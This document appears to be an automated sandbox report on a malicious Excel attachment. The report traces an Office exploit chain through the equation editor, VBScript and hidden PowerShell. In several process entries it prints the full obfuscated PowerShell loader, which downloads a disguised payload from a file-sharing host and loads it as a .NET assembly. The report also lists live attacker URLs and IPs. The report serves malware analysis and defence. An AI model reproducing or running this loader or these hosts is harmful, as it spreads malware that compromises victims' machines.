    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (127 identical entries)
    Source: Pedido No 4500924462.xls | Stream path 'Workbook' entropy: 7.99733421223 (max. 8.0)
    Source: 8A830000.0.dr | Stream path 'Workbook' entropy: 7.99803585802 (max. 8.0)
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (3 identical entries)
    Source: C:\Windows\SysWOW64\wscript.exe | Window found: window name: WSH-Timer
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 1979
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2435
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 2163
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3832 | Thread sleep time: -420000s >= -30000s
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4020 | Thread sleep time: -60000s >= -30000s
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3984 | Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4044 | Thread sleep count: 2435 > 30
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4044 | Thread sleep count: 2163 > 30
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2464 | Thread sleep time: -60000s >= -30000s
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1484 | Thread sleep time: -2767011611056431s >= -30000s
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4036 | Thread sleep time: -922337203685477s >= -30000s
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477 (3 identical entries)
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Code function: 9_2_03570636 mov edx, dword ptr fs:[00000030h] 9_2_03570636
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process token adjusted: Debug (2 identical entries)

    HIPS / PFW / Operating System Protection Evasion

    Source: Yara match; File source: Process Memory Space: powershell.exe PID: 4024, type: MEMORYSTR
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemegivenmebesttokissyourlipswithentirethingsf9rm.vBs"
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('Jf5imageUrl = 7Zahttps://3105.fil'+'email.com/a'+'pi/file/get?filekey=shTPHbCPX8o-lO'+'tCqHLG6_0xCy-xl4tnxlAVbQ9'+'5-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c 7Za;Jf5webClient = New-Object System.Net'+'.WebClient;'+'Jf5ima'+'geBytes = Jf5webClient.DownloadData(Jf5imageUrl);Jf5imageText = [System.Tex'+'t.Encoding]::UTF8.GetString(Jf5imageByt'+'es);Jf5startFlag = 7Za<<BASE64_START>'+'>7Za;Jf5endFlag '+'= 7Za<<BASE64_END>>7Za;Jf5startIndex = Jf5imageText'+'.IndexOf(Jf5startFlag);Jf5endIndex = Jf5imageText.IndexOf(J'+'f5endFlag);Jf5startIndex -ge 0 -and Jf5endInd'+'ex -gt Jf5startIndex;Jf5startIndex += Jf5startFlag.Lengt'+'h;Jf5base64Length = Jf'+'5endIndex - Jf5'+'startInd'+'ex;Jf5base64Command ='+' Jf5'+'imageText.Substring(Jf5startIndex, Jf5ba'+'se64Length);Jf5base6'+'4Reversed = -j'+'oin (Jf5base6'+'4Command.ToCharArray() QG0 ForEach-Object'+' { Jf5_ })[-1..-(Jf5'+'bas'+'e64Command.Length)];Jf5commandBytes = [System.Convert]::FromBase64String(Jf5base64Reversed);Jf5loadedAssembly = [System.Reflection.Assembly'+']::Load(Jf5commandBytes);Jf5vaiMethod'+' = [dnlib.IO.Home].GetMethod(7ZaVAI7Za);Jf5vaiMethod.Invoke(Jf5null, @(7Zatxt.RTCCCRV/622/512.821.59.32//:p'+'tth7Za, 7Zadesativado7Za, 7Zadesat'+'ivado7Za, 7Zadesativ'+'ado7Za, 7Zaas'+'pne'+'t_compiler7Za, 7Zadesativado7Za, 7Zadesativado7Za,7Z'+'adesativad'+'o7Za,7Za'+'desat'+'ivado7Za,7Zadesa'+'tivado7Za,7Zadesativado7Za,7Zadesativa'+'do7Za,7Za17Za,7Zadesativado7Za));').REPlAce('Jf5',[StriNG][ChAR]36).REPlAce('7Za',[StriNG][ChAR]39).REPlAce(([ChAR]81+[ChAR]71+[ChAR]48),[StriNG][ChAR]124) | .( $pshOmE[21]+$pSHOme[30]+'x')"Jump to behavior
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = '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';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxd
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "('jf5imageurl = 7zahttps://3105.fil'+'email.com/a'+'pi/file/get?filekey=shtphbcpx8o-lo'+'tcqhlg6_0xcy-xl4tnxlavbq9'+'5-dvitk5carandqjbb3mexfwqzkmtxg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c 7za;jf5webclient = new-object system.net'+'.webclient;'+'jf5ima'+'gebytes = jf5webclient.downloaddata(jf5imageurl);jf5imagetext = [system.tex'+'t.encoding]::utf8.getstring(jf5imagebyt'+'es);jf5startflag = 7za<<base64_start>'+'>7za;jf5endflag '+'= 7za<<base64_end>>7za;jf5startindex = jf5imagetext'+'.indexof(jf5startflag);jf5endindex = jf5imagetext.indexof(j'+'f5endflag);jf5startindex -ge 0 -and jf5endind'+'ex -gt jf5startindex;jf5startindex += jf5startflag.lengt'+'h;jf5base64length = jf'+'5endindex - jf5'+'startind'+'ex;jf5base64command ='+' jf5'+'imagetext.substring(jf5startindex, jf5ba'+'se64length);jf5base6'+'4reversed = -j'+'oin (jf5base6'+'4command.tochararray() qg0 foreach-object'+' { jf5_ })[-1..-(jf5'+'bas'+'e64command.length)];jf5commandbytes = [system.convert]::frombase64string(jf5base64reversed);jf5loadedassembly = [system.reflection.assembly'+']::load(jf5commandbytes);jf5vaimethod'+' = [dnlib.io.home].getmethod(7zavai7za);jf5vaimethod.invoke(jf5null, @(7zatxt.rtcccrv/622/512.821.59.32//:p'+'tth7za, 7zadesativado7za, 7zadesat'+'ivado7za, 7zadesativ'+'ado7za, 7zaas'+'pne'+'t_compiler7za, 7zadesativado7za, 7zadesativado7za,7z'+'adesativad'+'o7za,7za'+'desat'+'ivado7za,7zadesa'+'tivado7za,7zadesativado7za,7zadesativa'+'do7za,7za17za,7zadesativado7za));').replace('jf5',[string][char]36).replace('7za',[string][char]39).replace(([char]81+[char]71+[char]48),[string][char]124) | .( $pshome[21]+$pshome[30]+'x')"
    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -command $codigo = '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';$owjuxd = [system.text.encoding]::utf8.getstring([system.convert]::frombase64string($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -noprofile -command $owjuxdJump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -noprofile -command "('jf5imageurl = 7zahttps://3105.fil'+'email.com/a'+'pi/file/get?filekey=shtphbcpx8o-lo'+'tcqhlg6_0xcy-xl4tnxlavbq9'+'5-dvitk5carandqjbb3mexfwqzkmtxg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c 7za;jf5webclient = new-object system.net'+'.webclient;'+'jf5ima'+'gebytes = jf5webclient.downloaddata(jf5imageurl);jf5imagetext = [system.tex'+'t.encoding]::utf8.getstring(jf5imagebyt'+'es);jf5startflag = 7za<<base64_start>'+'>7za;jf5endflag '+'= 7za<<base64_end>>7za;jf5startindex = jf5imagetext'+'.indexof(jf5startflag);jf5endindex = jf5imagetext.indexof(j'+'f5endflag);jf5startindex -ge 0 -and jf5endind'+'ex -gt jf5startindex;jf5startindex += jf5startflag.lengt'+'h;jf5base64length = jf'+'5endindex - jf5'+'startind'+'ex;jf5base64command ='+' jf5'+'imagetext.substring(jf5startindex, jf5ba'+'se64length);jf5base6'+'4reversed = -j'+'oin (jf5base6'+'4command.tochararray() qg0 foreach-object'+' { jf5_ })[-1..-(jf5'+'bas'+'e64command.length)];jf5commandbytes = [system.convert]::frombase64string(jf5base64reversed);jf5loadedassembly = [system.reflection.assembly'+']::load(jf5commandbytes);jf5vaimethod'+' = [dnlib.io.home].getmethod(7zavai7za);jf5vaimethod.invoke(jf5null, @(7zatxt.rtcccrv/622/512.821.59.32//:p'+'tth7za, 7zadesativado7za, 7zadesat'+'ivado7za, 7zadesativ'+'ado7za, 7zaas'+'pne'+'t_compiler7za, 7zadesativado7za, 7zadesativado7za,7z'+'adesativad'+'o7za,7za'+'desat'+'ivado7za,7zadesa'+'tivado7za,7zadesativado7za,7zadesativa'+'do7za,7za17za,7zadesativado7za));').replace('jf5',[string][char]36).replace('7za',[string][char]39).replace(([char]81+[char]71+[char]48),[string][char]124) | .( $pshome[21]+$pshome[30]+'x')"Jump to behavior
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe; Queries volume information: C:\ VolumeInformation
    Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity Information221
    Scripting
    Valid Accounts121
    Command and Scripting Interpreter
    221
    Scripting
    11
    Process Injection
    1
    Masquerading
    OS Credential Dumping1
    Process Discovery
    Remote ServicesData from Local System1
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault Accounts43
    Exploitation for Client Execution
    1
    DLL Side-Loading
    1
    DLL Side-Loading
    21
    Virtualization/Sandbox Evasion
    LSASS Memory21
    Virtualization/Sandbox Evasion
    Remote Desktop ProtocolData from Removable Media25
    Ingress Tool Transfer
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain Accounts3
    PowerShell
    Logon Script (Windows)Logon Script (Windows)11
    Process Injection
    Security Account Manager1
    Application Window Discovery
    SMB/Windows Admin SharesData from Network Shared Drive3
    Non-Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
    Deobfuscate/Decode Files or Information
    NTDS1
    Remote System Discovery
    Distributed Component Object ModelInput Capture14
    Application Layer Protocol
    Traffic DuplicationData Destruction
    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
    Obfuscated Files or Information
    LSA Secrets1
    File and Directory Discovery
    SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
    DLL Side-Loading
    Cached Domain Credentials13
    System Information Discovery
    VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
    Behavior Graph ID: 1563998; Sample: Pedido No 4500924462.xls; Startdate: 27/11/2024; Architecture: WINDOWS; Score: 100

    Behavior graph (rendered graph reduced to its nodes; node numbers and "a->b" edges are the graph's own):

    Node 2 (Start)
    • DNS/IP: ljg.cl (41, 2->41)
    • Signatures: Suricata IDS alerts for network traffic (53); Malicious sample detected (through community Yara rule) (55); Antivirus detection for dropped file (57); 17 other signatures (59)
    • Started: EXCEL.EXE (9, 57 31, 2->9)

    Node 9 (EXCEL.EXE)
    • DNS/IP: 23.95.128.215, 49166, 49173, 49174, AS-COLOCROSSINGUS, United States (43, 9->43); ljg.cl 152.231.102.107, 443, 49165, 49167, ENTELCHILESACL, Chile (45, 9->45)
    • Dropped: C:\Users\...\Pedido No 4500924462.xls (copy), Composite (31); seemybestmagicalth...______bestof[1].doc, Rich (33)
    • Started: WINWORD.EXE (13, 348 30, 9->13); wscript.exe (18, 1, 9->18)

    Node 13 (WINWORD.EXE)
    • DNS/IP: ljg.cl (51, 13->51)
    • Dropped: C:\Users\user\AppData\Roaming\...\ljg.cl.url, MS (35); ~WRF{498AB1A3-A070...3-2EA9C1DC4C55}.tmp, Composite (37); C:\Users\user\AppData\Local\...\B7AFCBA1.doc, Rich (39)
    • Signatures: Microsoft Office launches external ms-search protocol handler (WebDAV) (69); Office viewer loads remote template (71); Microsoft Office drops suspicious files (73)
    • Started: EQNEDT32.EXE (20, 12, 13->20)

    Node 18 (wscript.exe)
    • Signatures: Suspicious powershell command line found (75); Wscript starts Powershell (via cmd or directly) (77); Bypasses PowerShell execution policy (79); 2 other signatures (81)
    • Started: powershell.exe (24, 4, 18->24)

    Node 20 (EQNEDT32.EXE)
    • Dropped: seemegivenmebestto...ntirethingsf9rm.vBs, Unicode (29)
    • Signatures: Office equation editor establishes network connection (61); Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) (63)

    Node 24 (powershell.exe)
    • Signatures: Suspicious powershell command line found (65); Obfuscated command line found (67)
    • Started: powershell.exe (26, 12 5, 24->26)

    Node 26 (powershell.exe)
    • DNS/IP: ip.3105.filemail.com 193.30.119.205, 443, 49175, DFNVereinzurFoerderungeinesDeutschenForschungsnetzese, unknown (47, 26->47); 3105.filemail.com (49, 26->49)

    Source | Detection | Scanner | Label | Link
    Pedido No 4500924462.xls | 24% | ReversingLabs | Document-Excel.Exploit.CVE-2017-0199 |
    Pedido No 4500924462.xls | 100% | Joe Sandbox ML | |

    Source | Detection | Scanner | Label | Link
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\B7AFCBA1.doc | 100% | Avira | HEUR/Rtf.Malformed |
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seemybestmagicalthingseniterworldwhcihgivenbesthingsenterietimegiven_____________givembestthingswhichireallyfelltodobestthingswhichireallynedd__________bestof[1].doc | 100% | Avira | HEUR/Rtf.Malformed |
    C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{498AB1A3-A070-4AC4-B443-2EA9C1DC4C55}.tmp | 100% | Avira | EXP/CVE-2017-11882.Gen |
    No Antivirus matches
    No Antivirus matches
    Source | Detection | Scanner | Label | Link
    http://23.95.128.215/43/seemegivenmebesttokissyourlipswithentirethingsf9rmegive.tIFj | 0% | Avira URL Cloud | safe |
    http://23.95.128.215/43/seemegivenmebesttokissyourlipswithentirethingsf9rmegive.tIF? | 0% | Avira URL Cloud | safe |
    https://ljg.cl/mwoI?&put=straight&glider=bawdy&mice=accurate&icebreaker=questionable&riverbed=orange | 0% | Avira URL Cloud | safe |
    https://3105.fil | 0% | Avira URL Cloud | safe |
    https://ljg.cl/mwoI?&put=straight&glider=bawdy&mice=accurate&icebreaker=questionable&riverbed=orange&slice | 0% | Avira URL Cloud | safe |
    http://23.95.128.215/43/hu/seemybestmagicalthingseniterworldwhcihgivenbesthingsenterietimegiven_____________givembestthingswhichireallyfelltodobestthingswhichireallynedd__________bestofluckthignsaregoodnadsage.doc | 0% | Avira URL Cloud | safe |
    http://23.95.128.215/43/seemegivenmebesttokissyourlipswithentirethingsf9rmegive.tIF | 0% | Avira URL Cloud | safe |
    https://ljg.cl/ | 0% | Avira URL Cloud | safe |
    Name | IP | Active | Malicious | Antivirus Detection | Reputation
    ip.3105.filemail.com | 193.30.119.205 | true | false | | high
    ljg.cl | 152.231.102.107 | true | false | | high
    3105.filemail.com | unknown | unknown | false | | high
    Name | Malicious | Antivirus Detection | Reputation
    http://23.95.128.215/43/seemegivenmebesttokissyourlipswithentirethingsf9rmegive.tIF | true | Avira URL Cloud: safe | unknown
    https://ljg.cl/mwoI?&put=straight&glider=bawdy&mice=accurate&icebreaker=questionable&riverbed=orange&slice | false | Avira URL Cloud: safe | unknown
    http://23.95.128.215/43/hu/seemybestmagicalthingseniterworldwhcihgivenbesthingsenterietimegiven_____________givembestthingswhichireallyfelltodobestthingswhichireallynedd__________bestofluckthignsaregoodnadsage.doc | true | Avira URL Cloud: safe | unknown
    https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c | false | | high
    Name | Source | Malicious | Antivirus Detection | Reputation
    https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNd | powershell.exe, 0000000D.00000002.471392095.0000000002719000.00000004.00000800.00020000.00000000.sdmp | false | | high
    http://nuget.org/NuGet.exe | powershell.exe, 0000000D.00000002.472218008.0000000003609000.00000004.00000800.00020000.00000000.sdmp | false | | high
    http://crl.entrust.net/server1.crl0 | powershell.exe, 0000000D.00000002.472460335.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp | false | | high
    http://ocsp.entrust.net03 | powershell.exe, 0000000D.00000002.472460335.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp | false | | high
    https://3105.fil | powershell.exe, 0000000D.00000002.471392095.0000000002999000.00000004.00000800.00020000.00000000.sdmp | true | Avira URL Cloud: safe | unknown
    https://contoso.com/License | powershell.exe, 0000000D.00000002.472218008.0000000003609000.00000004.00000800.00020000.00000000.sdmp | false | | high
    https://contoso.com/Icon | powershell.exe, 0000000D.00000002.472218008.0000000003609000.00000004.00000800.00020000.00000000.sdmp | false | | high
    http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | powershell.exe, 0000000D.00000002.472460335.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp | false | | high
    http://www.diginotar.nl/cps/pkioverheid0 | powershell.exe, 0000000D.00000002.472460335.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp | false | | high
    http://go.micros | powershell.exe, 0000000D.00000002.471392095.0000000002B1B000.00000004.00000800.00020000.00000000.sdmp | false | | high
    https://ljg.cl/mwoI?&put=straight&glider=bawdy&mice=accurate&icebreaker=questionable&riverbed=orange | Pedido No 4500924462.xls, 8A830000.0.dr, ~DF5A3DDFB1D8F2532B.TMP.0.dr | false | Avira URL Cloud: safe | unknown
    http://23.95.128.215/43/seemegivenmebesttokissyourlipswithentirethingsf9rmegive.tIFj | EQNEDT32.EXE, 00000009.00000002.456882601.0000000003570000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
    http://crl.pkioverheid.nl/DomOvLatestCRL.crl0 | powershell.exe, 0000000D.00000002.472460335.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp | false | | high
    https://contoso.com/ | powershell.exe, 0000000D.00000002.472218008.0000000003609000.00000004.00000800.00020000.00000000.sdmp | false | | high
    https://nuget.org/nuget.exe | powershell.exe, 0000000D.00000002.472218008.0000000003609000.00000004.00000800.00020000.00000000.sdmp | false | | high
    http://23.95.128.215/43/seemegivenmebesttokissyourlipswithentirethingsf9rmegive.tIF? | EQNEDT32.EXE, 00000009.00000002.456656505.000000000057F000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
    https://ljg.cl/ | ljg.cl.url.3.dr | false | Avira URL Cloud: safe | unknown
    http://ocsp.entrust.net0D | powershell.exe, 0000000D.00000002.472460335.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp | false | | high
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 0000000B.00000002.473369989.0000000002638000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.471392095.00000000025E1000.00000004.00000800.00020000.00000000.sdmp | false | | high
    https://secure.comodo.com/CPS0 | powershell.exe, 0000000D.00000002.472460335.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp | false | | high
    http://crl.entrust.net/2048ca.crl0 | powershell.exe, 0000000D.00000002.472460335.0000000004FE6000.00000004.00000020.00020000.00000000.sdmp | false | | high
    https://3105.filemail.com | powershell.exe, 0000000D.00000002.471392095.0000000002719000.00000004.00000800.00020000.00000000.sdmp | false | | high
    IP | Domain | Country | ASN | ASN Name | Malicious
    193.30.119.205 | ip.3105.filemail.com | unknown | 680 | DFNVereinzurFoerderungeinesDeutschenForschungsnetzese | false
    152.231.102.107 | ljg.cl | Chile | 6471 | ENTELCHILESACL | false
    23.95.128.215 | unknown | United States | 36352 | AS-COLOCROSSINGUS | true
    Joe Sandbox version: 41.0.0 Charoite
    Analysis ID: 1563998
    Start date and time: 2024-11-27 17:54:45 +01:00
    Joe Sandbox product: CloudBasic
    Overall analysis duration: 0h 5m 15s
    Hypervisor based Inspection enabled: false
    Report type: full
    Cookbook file name: defaultwindowsofficecookbook.jbs
    Analysis system description: Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
    Number of new started processes analysed: 15
    Number of new started drivers analysed: 1
    Number of existing processes analysed: 0
    Number of existing drivers analysed: 0
    Number of injected processes analysed: 0
    Technologies:
    • HCA enabled
    • EGA enabled
    • GSI enabled (VBA)
    • AMSI enabled
    Analysis Mode: default
    Analysis stop reason: Timeout
    Sample name: Pedido No 4500924462.xls
    Detection: MAL
    Classification: mal100.expl.evad.winXLS@9/28@10/3
    EGA Information:
    • Successful, ratio: 33.3%
    HCA Information:
    • Successful, ratio: 100%
    • Number of executed functions: 26
    • Number of non-executed functions: 13
    Cookbook Comments:
    • Found application associated with file extension: .xls
    • Found Word or Excel or PowerPoint or XPS Viewer
    • Attach to Office via COM
    • Active ActiveX Object
    • Active ActiveX Object
    • Scroll down
    • Close Viewer
    • Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe, rundll32.exe, WMIADAP.exe, conhost.exe
    • Execution Graph export aborted for target powershell.exe, PID 3924 because it is empty
    • Execution Graph export aborted for target powershell.exe, PID 4024 because it is empty
    • Not all processes were analyzed; the report is missing behavior information
    • Report size exceeded maximum capacity and may have missing behavior information.
    • Report size getting too big, too many NtOpenKeyEx calls found.
    • Report size getting too big, too many NtQueryValueKey calls found.
    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
    • VT rate limit hit for: Pedido No 4500924462.xls
    Time | Type | Description
    11:56:21 | API Interceptor | 96x Sleep call for process: EQNEDT32.EXE modified
    11:56:25 | API Interceptor | 13x Sleep call for process: wscript.exe modified
    11:56:26 | API Interceptor | 70x Sleep call for process: powershell.exe modified
                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                              193.30.119.20526-11-24_. AVIMAR SHIP CHANDLERS.xlsGet hashmaliciousHTMLPhisherBrowse
                                                List#U0103 de produse.xlsGet hashmaliciousHTMLPhisherBrowse
                                                  Inquiry.jsGet hashmaliciousUnknownBrowse
                                                    Shipping Document.xla.xlsxGet hashmaliciousHTMLPhisherBrowse
                                                      creamymilkburnwtithsweetheartshegivenmebestterthingswhichnewandshineforme.htaGet hashmaliciousCobalt Strike, FormBook, HTMLPhisherBrowse
                                                        sweetbabygivenbestthignsetnirelifegivenbackbestthignsalways.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                          thinkingbestthingswhichcomingetniretimegivenmegood.htaGet hashmaliciousCobalt Strike, Remcos, HTMLPhisherBrowse
                                                            Doc261124.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                              New RFQ20241142.xlsGet hashmaliciousFormBook, HTMLPhisherBrowse
                                                                Payment Advice.xlsGet hashmaliciousRemcos, HTMLPhisherBrowse
                                                                  152.231.102.107List#U0103 de produse.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                    Shipping Document.xla.xlsxGet hashmaliciousHTMLPhisherBrowse
                                                                      23.95.128.21526-11-24_. AVIMAR SHIP CHANDLERS.xlsGet hashmaliciousHTMLPhisherBrowse
                                                                      • 23.95.128.215/226/wc/greatthingetniretimewithgoodnewgivenwhichgiventhnseethebest.hta
Match | Associated Sample Name / URL | Detection | Threat Name | Context
ip.3105.filemail.com | 26-11-24_. AVIMAR SHIP CHANDLERS.xls | malicious | HTMLPhisher
  • 193.30.119.205
ip.3105.filemail.com | List#U0103 de produse.xls | malicious | HTMLPhisher
  • 193.30.119.205
ip.3105.filemail.com | Inquiry.js | malicious | Unknown
  • 193.30.119.205
ip.3105.filemail.com | Shipping Document.xla.xlsx | malicious | HTMLPhisher
  • 193.30.119.205
ip.3105.filemail.com | creamymilkburnwtithsweetheartshegivenmebestterthingswhichnewandshineforme.hta | malicious | Cobalt Strike, FormBook, HTMLPhisher
  • 193.30.119.205
ip.3105.filemail.com | sweetbabygivenbestthignsetnirelifegivenbackbestthignsalways.hta | malicious | Cobalt Strike, Remcos, HTMLPhisher
  • 193.30.119.205
ip.3105.filemail.com | thinkingbestthingswhichcomingetniretimegivenmegood.hta | malicious | Cobalt Strike, Remcos, HTMLPhisher
  • 193.30.119.205
ip.3105.filemail.com | Doc261124.vbs | malicious | Snake Keylogger, VIP Keylogger
  • 193.30.119.205
ip.3105.filemail.com | New RFQ20241142.xls | malicious | FormBook, HTMLPhisher
  • 193.30.119.205
ip.3105.filemail.com | Payment Advice.xls | malicious | Remcos, HTMLPhisher
  • 193.30.119.205
ljg.cl | List#U0103 de produse.xls | malicious | HTMLPhisher
  • 152.231.102.107
ljg.cl | Shipping Document.xla.xlsx | malicious | HTMLPhisher
  • 152.231.102.107
Match | Associated Sample Name / URL | Detection | Threat Name | Context
AS-COLOCROSSINGUS | 26-11-24_. AVIMAR SHIP CHANDLERS.xls | malicious | HTMLPhisher
  • 23.95.128.215
AS-COLOCROSSINGUS | container payment.xls | malicious | Unknown
  • 107.175.113.196
AS-COLOCROSSINGUS | container payment.xls | malicious | Unknown
  • 107.175.113.196
AS-COLOCROSSINGUS | 8gLdIfw09Wi50H5.exe | malicious | Remcos, PureLog Stealer
  • 192.3.220.30
AS-COLOCROSSINGUS | arm.nn.elf | malicious | Mirai, Okiru
  • 192.227.170.51
AS-COLOCROSSINGUS | nabmips.elf | malicious | Unknown
  • 104.170.223.54
AS-COLOCROSSINGUS | nabsh4.elf | malicious | Unknown
  • 107.173.108.43
